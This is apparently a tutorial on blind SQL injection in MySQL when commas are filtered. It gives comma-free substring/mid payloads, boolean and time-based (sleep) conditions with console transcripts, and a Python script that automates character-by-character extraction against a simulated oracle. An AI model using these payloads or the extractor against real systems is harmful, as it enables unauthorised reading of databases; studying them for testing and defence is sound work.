0x00 Overview
Injection technique when the comma (,) is not allowed
- substring(str FROM pos)
- substr(str FROM pos)
- mid(str FROM pos)
- Returns the substring of str starting at position pos. There is no length argument, so the expression needs no comma. Because ascii() only evaluates the leftmost character of its argument, ascii(substring(str FROM pos)) gives the code of exactly the pos-th character even though the rest of the string is still present; the variant substring(str FROM pos FOR 1) returns that single character directly, again without a comma.
0x01 Solutions
0x01.1 Solution 1
mysql> select ascii(substring((select user()) from 1));
+------------------------------------------+
| ascii(substring((select user()) from 1)) |
+------------------------------------------+
|                                      114 |
+------------------------------------------+
1 row in set (0.00 sec)
mysql> select ascii(substring((select user()) from 2));
+------------------------------------------+
| ascii(substring((select user()) from 2)) |
+------------------------------------------+
|                                      111 |
+------------------------------------------+
1 row in set (0.00 sec)
0x01.2 Solution 2
mysql> select substring((select user()) from 1 for 1);
+-----------------------------------------+
| substring((select user()) from 1 for 1) |
+-----------------------------------------+
| r                                       |
+-----------------------------------------+
1 row in set (0.00 sec)
mysql> select substring((select user()) from 2 for 1);
+-----------------------------------------+
| substring((select user()) from 2 for 1) |
+-----------------------------------------+
| o                                       |
+-----------------------------------------+
1 row in set (0.00 sec)
0x02 Blind injection experiment
0x02.1 Baseline data
// current user
mysql> select user();
+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
// test data
mysql> select * from test where id = 1;
+----+------+------+---------+
| id | test | map  | content |
+----+------+------+---------+
|  1 |    1 | NULL | NULL    |
+----+------+------+---------+
1 row in set (0.00 sec)
0x02.2 Encoding conversion
// ASCII code of the first character
mysql> select ascii(mid(user() from 1));
+---------------------------+
| ascii(mid(user() from 1)) |
+---------------------------+
|                       114 |
+---------------------------+
1 row in set (0.00 sec)
// ASCII code of the second character
mysql> select ascii(mid(user() from 2));
+---------------------------+
| ascii(mid(user() from 2)) |
+---------------------------+
|                       111 |
+---------------------------+
1 row in set (0.00 sec)
// decimal code back to a character
mysql> select char(114);
+-----------+
| char(114) |
+-----------+
| r         |
+-----------+
1 row in set (0.00 sec)
// decimal code back to a character
mysql> select char(111);
+-----------+
| char(111) |
+-----------+
| o         |
+-----------+
1 row in set (0.00 sec)
0x02.3 Solution 1 - boolean-based blind injection to read the database user name
substring, substr and mid are exploited in exactly the same way, so only one of them is shown.
// condition true: the row comes back
mysql> SELECT * from test where id = 1 and (select ascii(mid(user() from 1))=114);
+----+------+------+---------+
| id | test | map  | content |
+----+------+------+---------+
|  1 |    1 | NULL | NULL    |
+----+------+------+---------+
1 row in set (0.00 sec)
// condition false: no row
mysql> SELECT * from test where id = 1 and (select ascii(mid(user() from 1))=119);
Empty set (0.00 sec)
0x02.4 Solution 1 - time-based blind injection to read the database user name
substring, substr and mid are exploited in exactly the same way, so only one of them is shown. Note that sleep(5) returns 0 once the delay has elapsed, so with "and case when (...) then sleep(5) else 0 end" the WHERE clause is false in both branches and the query returns Empty set either way; the only signal is the elapsed time (5.00 sec versus 0.00 sec).
// condition true: the response is delayed by 5 seconds
mysql> SELECT * from test where id = 1 and case when(ascii(substring(user() from 1))=114) then sleep(5) else 0 end;
Empty set (5.00 sec)
// condition false: no delay
mysql> SELECT * from test where id = 1 and case when(ascii(substring(user() from 1))=119) then sleep(5) else 0 end;
Empty set (0.00 sec)
0x02.5 Solution 2 - time-based blind injection to read the database user name
substring, substr and mid are exploited in exactly the same way, so only one of them is shown. This run was made against a different test table (tdb_goods), but the injected condition does not depend on the table: it compares a single character returned by "from N for 1" with a literal instead of comparing an ASCII code.
// condition true: the response is delayed by 5 seconds
mysql> SELECT * from tdb_goods where goods_id = 1 and case when(substring(user() from 1 for 1)='r') then sleep(5) else 0 end;
Empty set (5.00 sec)
// condition false: no delay
mysql> SELECT * from tdb_goods where goods_id = 1 and case when(substring(user() from 1 for 1)='x') then sleep(5) else 0 end;
Empty set (0.00 sec)
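The transcripts in 0x02.3 to 0x02.5 test one character at a time with a single equality. The script below, added here as a worked example and not part of the original post, automates the comma-free extraction: it builds the same "ascii(mid(user() from N))" and "mid(user() from N for 1)" conditions, drives a boolean oracle with ">" comparisons so each character costs about seven requests instead of up to 127, and stops when ascii() of the position past the end returns 0 (MySQL returns '' for a substring that starts after the end of the string, and ascii('') is 0). The oracle here is a constructed stand-in that evaluates the conditions against a hard-coded "root@localhost" (the value user() returned in the page's setup); against a real target it would be replaced by a function that sends the condition in the vulnerable parameter and checks whether the row (or the delay) comes back. The names simulated_oracle, boolean_payload, string_payload, time_payload, extract_char and extract_string are this example's own.

```python
import re

# Constructed stand-in for the page's MySQL server: SECRET plays the role of
# user() and the oracle answers exactly the comma-free conditions the page
# injects. It is not a database; against a real target, the oracle would send
# the condition in the vulnerable parameter and compare the HTTP response
# (row present / absent) or, for the time-based form, the response time.
SECRET = "root@localhost"  # what user() returned in the page's transcripts

_NUM = re.compile(r"ascii\(mid\(user\(\) from (\d+)\)\)(=|>|<)(\d+)")
_STR = re.compile(r"mid\(user\(\) from (\d+) for 1\)='(.)'")


def simulated_oracle(condition: str) -> bool:
    """True when 'where id = 1 and (<condition>)' would return the row."""
    m = _NUM.fullmatch(condition)
    if m:
        pos, op, val = int(m.group(1)), m.group(2), int(m.group(3))
        # MySQL: a substring starting past the end is '' and ascii('') is 0
        code = ord(SECRET[pos - 1]) if pos <= len(SECRET) else 0
        return {"=": code == val, ">": code > val, "<": code < val}[op]
    m = _STR.fullmatch(condition)
    if m:
        pos, ch = int(m.group(1)), m.group(2)
        return pos <= len(SECRET) and SECRET[pos - 1] == ch
    raise ValueError(f"unsupported condition: {condition}")


# --- payload builders: no comma anywhere -------------------------------------

def boolean_payload(pos: int, op: str, value: int) -> str:
    """Solution 1 (0x02.3): ascii(mid(user() from N)) compared with a number."""
    return f"ascii(mid(user() from {pos})){op}{value}"


def string_payload(pos: int, ch: str) -> str:
    """Solution 2 (0x02.5): mid(user() from N for 1) compared with one character.
    ch is assumed to be a single printable character other than a quote."""
    return f"mid(user() from {pos} for 1)='{ch}'"


def time_payload(condition: str, delay: int = 5) -> str:
    """Wrap a condition in the page's time-based form (0x02.4 / 0x02.5)."""
    return f"case when({condition}) then sleep({delay}) else 0 end"


# --- extraction ---------------------------------------------------------------

def extract_char(oracle, pos: int):
    """Binary-search the code of the pos-th character with '>' tests.
    Covers ASCII 0..127, which is 7 oracle queries per character; returns (code, queries)."""
    lo, hi, queries = 0, 127, 0
    while lo < hi:
        mid = (lo + hi) // 2
        queries += 1
        if oracle(boolean_payload(pos, ">", mid)):
            lo = mid + 1
        else:
            hi = mid
    return lo, queries


def extract_string(oracle, max_len: int = 64):
    """Read characters until ascii(mid(user() from N)) is 0, i.e. N is past the end.
    Returns (recovered string, total oracle queries)."""
    chars, total = [], 0
    for pos in range(1, max_len + 1):
        code, q = extract_char(oracle, pos)
        total += q
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars), total


if __name__ == "__main__":
    value, n = extract_string(simulated_oracle)
    print(f"user() = {value!r} recovered with {n} comma-free boolean queries")
    print("time-based form of the first test:",
          time_payload(boolean_payload(1, "=", 114)))
```

Running the script recovers "root@localhost" with 105 oracle queries (15 positions, including the terminating one, at 7 queries each). For the time-based variant, the same boolean_payload strings are wrapped by time_payload and the oracle decides on elapsed time rather than on the presence of the row; the comma-free shape of the condition is unchanged.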